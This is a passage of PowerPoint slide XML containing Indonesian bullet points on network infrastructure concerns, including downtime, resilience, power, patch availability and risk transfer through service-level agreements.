            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>reputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendapatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profitabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Waktu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>henti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeliharaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direncanakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direncanakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kemudahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pulih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pulih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intervensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> manual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangguh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fasilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>energi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gedung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> patch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firmware dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memelihara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vendornya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengalihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perjanjian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SLA) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penalti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
